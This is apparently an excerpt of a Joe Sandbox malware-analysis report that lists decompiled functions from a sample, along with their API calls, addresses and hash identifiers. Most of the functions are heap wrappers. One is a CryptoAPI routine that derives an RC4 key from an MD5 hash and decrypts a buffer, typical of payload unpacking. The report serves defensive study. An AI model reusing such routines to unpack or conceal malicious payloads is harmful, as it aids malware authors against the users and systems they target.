                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CE06D31B042059FC718CFA4D580AAEBBF1EF48325F554259E805E6341D330E890CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E011797C0(void* _a4) {
                                                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                                                            				char _t6;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_t6 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                                                                                                                                            					return _t6;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t3;
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x011797c7
                                                                                                                                                                                                                                                                            0x011797d6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011797d6
                                                                                                                                                                                                                                                                            0x011797dd

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011797CF
                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 011797D6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7376d8d97849127885ce6df4c3b977099f5b4cd798a32f2184cdaee99b5209a2
                                                                                                                                                                                                                                                                            • Instruction ID: 280747a0fe1440ec387ee8804e377030b70fec09b9a39ec1d7b632cf616ddf60
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7376d8d97849127885ce6df4c3b977099f5b4cd798a32f2184cdaee99b5209a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AC0127500060CABDB159E94D80CBA53B7CA704205F044011B60C85650C77094C4CBD1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E011797A0(long _a4) {
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x011797b0
                                                                                                                                                                                                                                                                            0x011797b7

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,01179FB2,?,01179FB2,00000000,?,?,?,01179E2D), ref: 011797A9
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,01179FB2,00000000,?,?,?,01179E2D), ref: 011797B0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                            • Opcode ID: f852d0422a5ebc7e8c3c81b5a36d5b374b6dc4fc9152b6731e4d84974c34f290
                                                                                                                                                                                                                                                                            • Instruction ID: a559d65727272d48dcf4f542c6d7333de47a9cc446aa770484efffe27a56c45c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f852d0422a5ebc7e8c3c81b5a36d5b374b6dc4fc9152b6731e4d84974c34f290
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43C09B75140309ABD6559FD8EC0DF95377DE749601F004011B71DC6244CA70A58447E2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                                                            			E00C81F89(void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                                                                            				char _t16;
                                                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                                            				char _t31;
                                                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(_t26);
                                                                                                                                                                                                                                                                            				_push(_t26);
                                                                                                                                                                                                                                                                            				_t16 = E00C7A89E(_t26, 0x40, 0x30); // executed
                                                                                                                                                                                                                                                                            				_t31 = _t16;
                                                                                                                                                                                                                                                                            				_v12 = _t31;
                                                                                                                                                                                                                                                                            				_t28 = _t30;
                                                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                                                            					_t2 = _t31 + 0xc00; // 0xc00
                                                                                                                                                                                                                                                                            					_t17 = _t2;
                                                                                                                                                                                                                                                                            					__eflags = _t31 - _t17;
                                                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                                                            						_t3 = _t31 + 0x20; // 0x20
                                                                                                                                                                                                                                                                            						_t35 = _t3;
                                                                                                                                                                                                                                                                            						_t33 = _t17;
                                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                                            							_t4 = _t35 - 0x20; // 0x0
                                                                                                                                                                                                                                                                            							E00C7ABA7(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                                                                                                                                                                                                                                            							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                                                                                                                                                                                                                                            							 *_t35 = 0;
                                                                                                                                                                                                                                                                            							_t35 = _t35 + 0x30;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                                                                                                                                                                                                                                            							 *((char*)(_t35 - 0x24)) = 0xa;
                                                                                                                                                                                                                                                                            							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                                                                                                                                                                                                                                            							 *((char*)(_t35 - 0x22)) = 0;
                                                                                                                                                                                                                                                                            							__eflags = _t35 - 0x20 - _t33;
                                                                                                                                                                                                                                                                            						} while (__eflags != 0);
                                                                                                                                                                                                                                                                            						_t31 = _v12;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t31 = 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E00C7A8FB(0);
                                                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x00c81f8e
                                                                                                                                                                                                                                                                            0x00c81f8f
                                                                                                                                                                                                                                                                            0x00c81f96
                                                                                                                                                                                                                                                                            0x00c81f9b
                                                                                                                                                                                                                                                                            0x00c81f9f
                                                                                                                                                                                                                                                                            0x00c81fa3
                                                                                                                                                                                                                                                                            0x00c81fa6
                                                                                                                                                                                                                                                                            0x00c81fac
                                                                                                                                                                                                                                                                            0x00c81fac
                                                                                                                                                                                                                                                                            0x00c81fb2
                                                                                                                                                                                                                                                                            0x00c81fb4
                                                                                                                                                                                                                                                                            0x00c81fb7
                                                                                                                                                                                                                                                                            0x00c81fb7
                                                                                                                                                                                                                                                                            0x00c81fba
                                                                                                                                                                                                                                                                            0x00c81fbc
                                                                                                                                                                                                                                                                            0x00c81fc2
                                                                                                                                                                                                                                                                            0x00c81fc6
                                                                                                                                                                                                                                                                            0x00c81fcb
                                                                                                                                                                                                                                                                            0x00c81fcf
                                                                                                                                                                                                                                                                            0x00c81fd1
                                                                                                                                                                                                                                                                            0x00c81fd4
                                                                                                                                                                                                                                                                            0x00c81fda
                                                                                                                                                                                                                                                                            0x00c81fe1
                                                                                                                                                                                                                                                                            0x00c81fe5
                                                                                                                                                                                                                                                                            0x00c81fe9
                                                                                                                                                                                                                                                                            0x00c81fec
                                                                                                                                                                                                                                                                            0x00c81fec
                                                                                                                                                                                                                                                                            0x00c81ff0
                                                                                                                                                                                                                                                                            0x00c81ff3
                                                                                                                                                                                                                                                                            0x00c81fa8
                                                                                                                                                                                                                                                                            0x00c81fa8
                                                                                                                                                                                                                                                                            0x00c81fa8
                                                                                                                                                                                                                                                                            0x00c81ff5
                                                                                                                                                                                                                                                                            0x00c82002

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A89E: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C79E7E,00000001,00000364,?,00C74DA8,?), ref: 00C7A8DF
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C81FF5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                                                                                                                            • Opcode ID: 154e6a49f97ac9bb763ea052cbc2ddbef1990dcc210eea0331650803906bd7bc
                                                                                                                                                                                                                                                                            • Instruction ID: 21641018b058754acaa5584ba29cdccf8d32c3f3a5ea77a44511f4bae2d6cc7a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 154e6a49f97ac9bb763ea052cbc2ddbef1990dcc210eea0331650803906bd7bc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B30149722043056BE3319F69C84195AFBDDFBC9330F25062DE694932C0EB30A946C779
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E00C7A89E(void* __ecx, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                                                            				signed int _t18;
                                                                                                                                                                                                                                                                            				long _t19;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                                                            				if(_t18 == 0) {
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					_t19 = _t18 * _a8;
                                                                                                                                                                                                                                                                            					if(_t19 == 0) {
                                                                                                                                                                                                                                                                            						_t19 = _t19 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						_t8 = RtlAllocateHeap( *0xd0df80, 8, _t19); // executed
                                                                                                                                                                                                                                                                            						if(_t8 != 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						__eflags = E00C7C902();
                                                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                                                            							L8:
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(E00C79A46())) = 0xc;
                                                                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t12 = E00C7C86C(_t15, _t19, __eflags, _t19);
                                                                                                                                                                                                                                                                            						_pop(_t15);
                                                                                                                                                                                                                                                                            						__eflags = _t12;
                                                                                                                                                                                                                                                                            						if(_t12 == 0) {
                                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t13 = 0xffffffe0;
                                                                                                                                                                                                                                                                            				if(_t13 / _t18 < _a8) {
                                                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x00c7a89e
                                                                                                                                                                                                                                                                            0x00c7a8a4
                                                                                                                                                                                                                                                                            0x00c7a8a9
                                                                                                                                                                                                                                                                            0x00c7a8b7
                                                                                                                                                                                                                                                                            0x00c7a8b7
                                                                                                                                                                                                                                                                            0x00c7a8bd
                                                                                                                                                                                                                                                                            0x00c7a8bf
                                                                                                                                                                                                                                                                            0x00c7a8bf
                                                                                                                                                                                                                                                                            0x00c7a8d6
                                                                                                                                                                                                                                                                            0x00c7a8df
                                                                                                                                                                                                                                                                            0x00c7a8e7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7a8c7
                                                                                                                                                                                                                                                                            0x00c7a8c9
                                                                                                                                                                                                                                                                            0x00c7a8eb
                                                                                                                                                                                                                                                                            0x00c7a8f0
                                                                                                                                                                                                                                                                            0x00c7a8f6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7a8f6
                                                                                                                                                                                                                                                                            0x00c7a8cc
                                                                                                                                                                                                                                                                            0x00c7a8d1
                                                                                                                                                                                                                                                                            0x00c7a8d2
                                                                                                                                                                                                                                                                            0x00c7a8d4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7a8d4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7a8d6
                                                                                                                                                                                                                                                                            0x00c7a8af
                                                                                                                                                                                                                                                                            0x00c7a8b5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C79E7E,00000001,00000364,?,00C74DA8,?), ref: 00C7A8DF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: cd84ae12a2b2fcf45df2d8ea6ac6f3bdb0c1cb57a44d0cea583fbfab37118915
                                                                                                                                                                                                                                                                            • Instruction ID: 799c8a1a6b7e5eacce3e6a42233a1b6816878e8e1308182ff61ca9eb92b04efe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd84ae12a2b2fcf45df2d8ea6ac6f3bdb0c1cb57a44d0cea583fbfab37118915
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0F05431605625A7DB216B679C05B5F3748EFC5770B14C126E82DBA2D0DA30DD02A6A3
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                                                            			E00C7BF3C(void* __ecx, long _a4) {
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                                                            				long _t8;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t7 = __ecx;
                                                                                                                                                                                                                                                                            				_t8 = _a4;
                                                                                                                                                                                                                                                                            				if(_t8 > 0xffffffe0) {
                                                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(E00C79A46())) = 0xc;
                                                                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                                                            					_t8 = _t8 + 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					_t4 = RtlAllocateHeap( *0xd0df80, 0, _t8); // executed
                                                                                                                                                                                                                                                                            					if(_t4 != 0) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					__eflags = E00C7C902();
                                                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t6 = E00C7C86C(_t7, _t8, __eflags, _t8);
                                                                                                                                                                                                                                                                            					_pop(_t7);
                                                                                                                                                                                                                                                                            					__eflags = _t6;
                                                                                                                                                                                                                                                                            					if(_t6 == 0) {
                                                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                            0x00c7bf3c
                                                                                                                                                                                                                                                                            0x00c7bf42
                                                                                                                                                                                                                                                                            0x00c7bf48
                                                                                                                                                                                                                                                                            0x00c7bf7a
                                                                                                                                                                                                                                                                            0x00c7bf7f
                                                                                                                                                                                                                                                                            0x00c7bf85
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7bf85
                                                                                                                                                                                                                                                                            0x00c7bf4c
                                                                                                                                                                                                                                                                            0x00c7bf4e
                                                                                                                                                                                                                                                                            0x00c7bf4e
                                                                                                                                                                                                                                                                            0x00c7bf65
                                                                                                                                                                                                                                                                            0x00c7bf6e
                                                                                                                                                                                                                                                                            0x00c7bf76
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7bf56
                                                                                                                                                                                                                                                                            0x00c7bf58
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7bf5b
                                                                                                                                                                                                                                                                            0x00c7bf60
                                                                                                                                                                                                                                                                            0x00c7bf61
                                                                                                                                                                                                                                                                            0x00c7bf63
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7bf63
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C7A7C2,00000000), ref: 00C7BF6E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: e56c831b998a9deff3053a7c3a561204ac166de86a242deae90fbe8472908643
                                                                                                                                                                                                                                                                            • Instruction ID: 624e76a7f06408f20fce01997a902a2e54b20257cc226766164b9cdfc42b5d5b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e56c831b998a9deff3053a7c3a561204ac166de86a242deae90fbe8472908643
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34E0E53910561797DA2026F79C0075A3A48EF41FA0F15C025EC2EA61A0CB20DD009AA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                                                            			E01178CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				long* _v24;
                                                                                                                                                                                                                                                                            				char* _t31;
                                                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                                                            				long** _t35;
                                                                                                                                                                                                                                                                            				char* _t52;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L15:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t31 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                                                            						_t32 = GetLastError();
                                                                                                                                                                                                                                                                            						_v16 = _t32;
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t52 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                            						if(_t32 != 0) {
                                                                                                                                                                                                                                                                            							_t34 = _a16;
                                                                                                                                                                                                                                                                            							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                            							if(_t34 != 0) {
                                                                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                                                                            								_t35 =  &_v24;
                                                                                                                                                                                                                                                                            								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                            								if(_t35 != 0) {
                                                                                                                                                                                                                                                                            									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                            									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L15;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x01178cf6
                                                                                                                                                                                                                                                                            0x01178d01
                                                                                                                                                                                                                                                                            0x01178e1a
                                                                                                                                                                                                                                                                            0x01178e20
                                                                                                                                                                                                                                                                            0x01178d25
                                                                                                                                                                                                                                                                            0x01178d25
                                                                                                                                                                                                                                                                            0x01178d35
                                                                                                                                                                                                                                                                            0x01178d3f
                                                                                                                                                                                                                                                                            0x01178d47
                                                                                                                                                                                                                                                                            0x01178d49
                                                                                                                                                                                                                                                                            0x01178d4f
                                                                                                                                                                                                                                                                            0x01178d59
                                                                                                                                                                                                                                                                            0x01178d6d
                                                                                                                                                                                                                                                                            0x01178d78
                                                                                                                                                                                                                                                                            0x01178d78
                                                                                                                                                                                                                                                                            0x01178d59
                                                                                                                                                                                                                                                                            0x01178d82
                                                                                                                                                                                                                                                                            0x01178d99
                                                                                                                                                                                                                                                                            0x01178da1
                                                                                                                                                                                                                                                                            0x01178da5
                                                                                                                                                                                                                                                                            0x01178db1
                                                                                                                                                                                                                                                                            0x01178db9
                                                                                                                                                                                                                                                                            0x01178dbb
                                                                                                                                                                                                                                                                            0x01178dc2
                                                                                                                                                                                                                                                                            0x01178dd5
                                                                                                                                                                                                                                                                            0x01178ddd
                                                                                                                                                                                                                                                                            0x01178df7
                                                                                                                                                                                                                                                                            0x01178dfe
                                                                                                                                                                                                                                                                            0x01178dfe
                                                                                                                                                                                                                                                                            0x01178ddd
                                                                                                                                                                                                                                                                            0x01178e08
                                                                                                                                                                                                                                                                            0x01178e08
                                                                                                                                                                                                                                                                            0x01178e14
                                                                                                                                                                                                                                                                            0x01178e14
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01178d82

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 01178D3F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01178D49
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178D78
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 01178D99
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 01178DB1
                                                                                                                                                                                                                                                                            • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 01178DD5
                                                                                                                                                                                                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 01178DF1
